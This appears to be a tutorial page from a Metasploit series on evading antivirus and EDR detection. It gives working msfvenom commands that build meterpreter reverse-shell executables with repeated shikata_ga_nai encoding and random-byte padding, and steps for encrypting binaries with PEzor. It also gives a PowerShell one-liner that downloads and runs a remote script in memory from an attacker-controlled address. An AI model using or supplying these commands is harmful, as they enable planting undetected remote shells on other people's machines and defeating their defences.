Skip to content

15. Metasploit Bypassing Antivirus and EDR Systems

Antivirus (AV) and Endpoint Detection and Response (EDR) systems monitor processes, memory, and behaviors. These techniques minimize detection.

A. Code Obfuscation

Shikata Ga Nai Encoder:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_payload.exe
  • -i 5: Encodes the payload 5 times for enhanced obfuscation.

B. Binary Padding

Add non-functional data to the binary to alter its signature:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o padded_payload.exe
dd if=/dev/urandom bs=1024 count=100 >> padded_payload.exe

C. Using PEzor

Encrypt and obfuscate binaries.

  1. Install PEzor:

    git clone https://github.com/phra/PEzor.git
cd PEzor
./PEzor.sh -h

  2. Run PEzor:

    ./PEzor.sh payload.exe

D. In-Memory Execution

Avoid writing to disk by loading payloads directly into memory. Use PowerShell:

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.ps1')
  • Replace the URL with a hosted PowerShell script.